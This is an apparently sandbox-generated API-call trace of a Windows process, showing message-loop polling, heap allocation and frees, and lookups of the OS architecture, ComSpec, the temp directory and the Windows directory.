PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0133.553] Sleep (dwMilliseconds=0xa) [0133.567] timeGetTime () returned 0x2dc0b [0133.568] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0133.568] Sleep (dwMilliseconds=0xa) [0133.583] timeGetTime () returned 0x2dc1b [0133.583] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0133.583] Sleep (dwMilliseconds=0xa) [0133.599] timeGetTime () returned 0x2dc2b [0133.599] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0133.599] Sleep (dwMilliseconds=0xa) [0133.615] timeGetTime () returned 0x2dc3a [0133.615] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0133.615] Sleep (dwMilliseconds=0xa) [0133.630] timeGetTime () returned 0x2dc4a [0133.630] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0133.630] Sleep (dwMilliseconds=0xa) [0133.645] timeGetTime () returned 0x2dc59 [0133.646] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0133.646] Sleep (dwMilliseconds=0xa) [0133.664] timeGetTime () returned 0x2dc69 [0133.664] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0133.665] Sleep (dwMilliseconds=0xa) [0133.677] timeGetTime () returned 0x2dc79 [0133.677] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0133.677] Sleep (dwMilliseconds=0xa) [0133.694] timeGetTime () returned 0x2dc88 [0133.694] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0133.694] Sleep (dwMilliseconds=0xa) [0133.708] timeGetTime () returned 0x2dc98 [0133.708] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0133.708] Sleep (dwMilliseconds=0xa) [0133.724] timeGetTime () returned 0x2dca7 [0133.724] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8f28 | out: hHeap=0x25c0000) returned 1 [0133.724] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0133.724] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0133.724] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0133.724] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0133.724] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8f28 [0133.724] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1058 [0133.724] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8d90 [0133.724] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1058 | out: hHeap=0x25c0000) returned 1 [0133.724] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24207f0 [0133.724] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1058 [0133.724] CharUpperBuffW (in: lpsz="OSArch", cchLength=0x6 | out: lpsz="OSARCH") returned 0x6 [0133.724] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8d60 [0133.724] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8c88 [0133.724] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a8f40 [0133.724] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a91b0 [0133.724] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8d60 | out: hHeap=0x25c0000) returned 1 [0133.724] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a8d60 [0133.724] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1068 [0133.724] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a91e0 [0133.724] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a91c8 [0133.724] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1158 [0133.724] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1068 | out: hHeap=0x25c0000) returned 1 [0133.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0133.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1058 | out: hHeap=0x25c0000) returned 1 [0133.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a91b0 | out: hHeap=0x25c0000) returned 1 [0133.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8f40 | out: hHeap=0x25c0000) returned 1 [0133.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8d60 | out: hHeap=0x25c0000) returned 1 [0133.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8c88 | out: hHeap=0x25c0000) returned 1 [0133.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8d90 | out: hHeap=0x25c0000) returned 1 [0133.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8f28 | out: hHeap=0x25c0000) returned 1 [0133.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0133.725] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1058 [0133.725] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0133.725] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0133.725] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="X64", cchCount1=3, lpString2="X86", cchCount2=3) returned 1 [0133.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a91c8 | out: hHeap=0x25c0000) returned 1 [0133.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1158 | out: hHeap=0x25c0000) returned 1 [0133.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a91e0 | out: hHeap=0x25c0000) returned 1 [0133.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0133.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0133.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1058 | out: hHeap=0x25c0000) returned 1 [0133.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0133.725] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0133.725] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0133.725] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a91e0 [0133.725] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1058 [0133.725] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a91c8 [0133.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1058 | out: hHeap=0x25c0000) returned 1 [0133.725] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24207f0 [0133.725] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1058 [0133.725] CharUpperBuffW (in: lpsz="OSArch", cchLength=0x6 | out: lpsz="OSARCH") returned 0x6 [0133.726] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8f28 [0133.726] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8d90 [0133.726] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a8c88 [0133.726] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8d60 [0133.726] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8f28 | out: hHeap=0x25c0000) returned 1 [0133.726] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a8f28 [0133.726] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1158 [0133.726] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8f40 [0133.726] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a91b0 [0133.726] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1068 [0133.726] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1158 | out: hHeap=0x25c0000) returned 1 [0133.726] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0133.726] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1058 | out: hHeap=0x25c0000) returned 1 [0133.726] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8d60 | out: hHeap=0x25c0000) returned 1 [0133.726] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8c88 | out: hHeap=0x25c0000) returned 1 [0133.726] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8f28 | out: hHeap=0x25c0000) returned 1 [0133.726] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8d90 | out: hHeap=0x25c0000) returned 1 [0133.726] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a91c8 | out: hHeap=0x25c0000) returned 1 [0133.726] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a91e0 | out: hHeap=0x25c0000) returned 1 [0133.726] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0133.726] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1058 [0133.726] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0133.726] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0133.726] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="X64", cchCount1=3, lpString2="X64", cchCount2=3) returned 2 [0133.726] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a91b0 | out: hHeap=0x25c0000) returned 1 [0133.726] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1068 | out: hHeap=0x25c0000) returned 1 [0133.726] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8f40 | out: hHeap=0x25c0000) returned 1 [0133.726] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0133.726] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0133.726] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1058 | out: hHeap=0x25c0000) returned 1 [0133.727] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0133.727] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d6e0 [0133.727] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0133.727] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0133.727] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8f40 [0133.727] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0133.727] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a91b0 [0133.727] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a91e0 [0133.727] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1058 [0133.727] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a91c8 [0133.727] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1058 | out: hHeap=0x25c0000) returned 1 [0133.727] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24207f0 [0133.727] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1058 [0133.727] CharUpperBuffW (in: lpsz="ComSpec", cchLength=0x7 | out: lpsz="COMSPEC") returned 0x7 [0133.727] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8d90 [0133.727] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8f28 [0133.727] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a8c88 [0133.727] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8d60 [0133.727] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8d90 | out: hHeap=0x25c0000) returned 1 [0133.727] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a8d90 [0133.727] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1068 [0133.727] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x8bf440, nSize=0x104 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0133.727] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9000 [0133.727] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0133.727] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1158 [0133.727] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1068 | out: hHeap=0x25c0000) returned 1 [0133.727] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0133.727] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1058 | out: hHeap=0x25c0000) returned 1 [0133.727] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8d60 | out: hHeap=0x25c0000) returned 1 [0133.728] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8c88 | out: hHeap=0x25c0000) returned 1 [0133.728] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8d90 | out: hHeap=0x25c0000) returned 1 [0133.728] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8f28 | out: hHeap=0x25c0000) returned 1 [0133.728] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a91c8 | out: hHeap=0x25c0000) returned 1 [0133.728] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a91e0 | out: hHeap=0x25c0000) returned 1 [0133.728] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a91b0 | out: hHeap=0x25c0000) returned 1 [0133.728] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1058 [0133.728] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0133.728] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a91b0 [0133.728] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xa0) returned 0x24207f0 [0133.728] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0133.728] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a91b0 | out: hHeap=0x25c0000) returned 1 [0133.728] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a91b0 [0133.728] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a91e0 [0133.728] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1068 [0133.728] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a91c8 [0133.728] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1068 | out: hHeap=0x25c0000) returned 1 [0133.728] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x249c7b0 [0133.728] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1068 [0133.728] CharUpperBuffW (in: lpsz="TempDir", cchLength=0x7 | out: lpsz="TEMPDIR") returned 0x7 [0133.728] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8f28 [0133.728] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8d90 [0133.728] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a8c88 [0133.728] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8d60 [0133.728] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8f28 | out: hHeap=0x25c0000) returned 1 [0133.728] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a8f28 [0133.728] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0133.728] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x8bf440 | out: lpBuffer="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\") returned 0x25 [0133.728] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9150 [0133.728] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x50) returned 0x240a4d0 [0133.729] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b0f98 [0133.729] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0133.729] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0133.729] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1068 | out: hHeap=0x25c0000) returned 1 [0133.729] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8d60 | out: hHeap=0x25c0000) returned 1 [0133.729] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8c88 | out: hHeap=0x25c0000) returned 1 [0133.729] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8f28 | out: hHeap=0x25c0000) returned 1 [0133.729] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8d90 | out: hHeap=0x25c0000) returned 1 [0133.729] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a91c8 | out: hHeap=0x25c0000) returned 1 [0133.729] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a91e0 | out: hHeap=0x25c0000) returned 1 [0133.729] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a91b0 | out: hHeap=0x25c0000) returned 1 [0133.729] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x240a4d0 | out: hHeap=0x25c0000) returned 1 [0133.729] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b0f98 | out: hHeap=0x25c0000) returned 1 [0133.729] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9150 | out: hHeap=0x25c0000) returned 1 [0133.729] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9150 [0133.729] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x190) returned 0x2416270 [0133.729] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0133.729] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9150 | out: hHeap=0x25c0000) returned 1 [0133.729] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9150 [0133.729] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a91b0 [0133.729] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b0f98 [0133.729] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a91e0 [0133.729] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b0f98 | out: hHeap=0x25c0000) returned 1 [0133.729] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24207f0 [0133.729] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b0f98 [0133.729] CharUpperBuffW (in: lpsz="WindowsDir", cchLength=0xa | out: lpsz="WINDOWSDIR") returned 0xa [0133.729] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a91c8 [0133.729] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8d90 [0133.729] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a8f28 [0133.729] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8c88 [0133.730] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a91c8 | out: hHeap=0x25c0000) returned 1 [0133.730] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a91c8 [0133.730] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1068 [0133.730] GetWindowsDirectoryW (in: lpBuffer=0x8bf440, uSize=0x104 | out: lpBuffer="C:\\Windows") returned 0xa [0133.730] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8d60 [0133.730] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x249d818 [0133.730] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1198 [0133.730] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1068 | out: hHeap=0x25c0000) returned 1 [0133.730] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0133.730] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b0f98 | out: hHeap=0x25c0000) returned 1 [0133.730] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8c88 | out: hHeap=0x25c0000) returned 1 [0133.730] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8f28 | out: hHeap=0x25c0000) returned 1 [0133.730] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a91c8 | out: hHeap=0x25c0000) returned 1 [0133.730] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8d90 | out: hHeap=0x25c0000) returned 1 [0133.730] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a91e0 | out: hHeap=0x25c0000) returned 1 [0133.730] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a91b0 | out: hHeap=0x25c0000) returned 1 [0133.730] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9150 | out: hHeap=0x25c0000) returned 1 [0133.730] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249d818 | out: hHeap=0x25c0000) returned 1 [0133.730] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0133.730] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8d60 | out: hHeap=0x25c0000) returned 1 [0133.730] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8d60 [0133.730] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8d60 | out: hHeap=0x25c0000) returned 1 [0133.730] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0133.730] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1058 | out: hHeap=0x25c0000) returned 1 [0133.730] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0133.730] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8d60 [0133.730] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0133.730] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9150 [0133.730] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a91b0 [0133.731] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1058 [0133.731] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a91e0 [0133.731] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1058 | out: hHeap=0x25c0000) returned 1 [0133.731] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24207f0 [0133.731] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1058 [0133.731] CharUpperBuffW (in: lpsz="TempDir", cchLength=0x7 | out: lpsz="TEMPDIR") returned 0x7 [0133.731] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8d90 [0133.731] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a91c8 [0133.731] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a8f28 [0133.731] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8c88 [0133.731] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8d90 | out: hHeap=0x25c0000) returned 1 [0133.731] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a8d90 [0133.731] 